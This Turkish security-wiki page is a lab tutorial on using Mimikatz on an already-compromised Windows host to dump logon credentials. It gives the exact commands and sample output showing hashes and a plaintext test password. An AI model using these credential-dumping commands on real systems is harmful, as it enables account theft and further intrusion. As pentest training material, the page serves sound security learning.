Mimikatz Kullanarak Parolaların Açık Hallerinin Elde Edilmesi

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Kullanıcı adı ve parolası elde bir sisteme network üzerinden sysinternal psexec ile erişim sağlanarak zararlı yazılım bulaştırılması ile meterpreter oturumu alındığında veya metasploit psexec modülü ile oturum alındığında hedef sisteme bir şekilde mimikatz programı yüklenebilir. Programın çalıştırılması durumunda ise sisteme giriş yapan kullanıcının parolası açık metin halinde görüntülenebilir.

Amaç:

Meterpreter veya sysinternal psexec ile erişim sağlanmış bir makineden açık parolaların alınması.

Araç:

  • Mimikatz

Lab Senaryosu:

Mimikatz uygulamasının bulunduğu dizine gidilir;

cd C:\Users\Administrator\Desktop\PentestTools\mimikatz_trunk\Win32

Mimikatz programı çalıştırılır ve parolaların elde edilmesi için aşağıda verilen komutlar girilir.

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonPasswords full

Authentication Id : 0 ; 379969 (00000000:0005cc41)
Session       	: Interactive from 1
User Name     	: Administrator
Domain        	: WIN7-PENTEST
SID           	: S-1-5-21-3000289417-1097748507-1909142520-500
   	msv :
    	[00000003] Primary
    	* Username : Administrator
    	* Domain   : WIN7-PENTEST
    	* LM   	: 5e7138d7de18eb9caad3b435b51404ee
    	* NTLM 	: 0be6df5ef766e7685b871428deaa0d5a
    	* SHA1 	: e65e7c011b3b9cf9b6a2b9ec3de00f82d2ba6747
   	tspkg :
    	* Username : Administrator
    	* Domain   : WIN7-PENTEST
    	* Password : bga
   	wdigest :
    	* Username : Administrator
    	* Domain   : WIN7-PENTEST
    	* Password : bga
   	kerberos :
    	* Username : Administrator
    	* Domain   : WIN7-PENTEST
    	* Password : bga
   	ssp :
   	credman :

Görüldüğü üzere parola “bga” dir. Bu işlemde parola ne kadar uzun olursa olsun elde edilebilecektir. Çünkü Windows işletim sistemleri parolaların açık halini ram üzerinde tutmaktadır.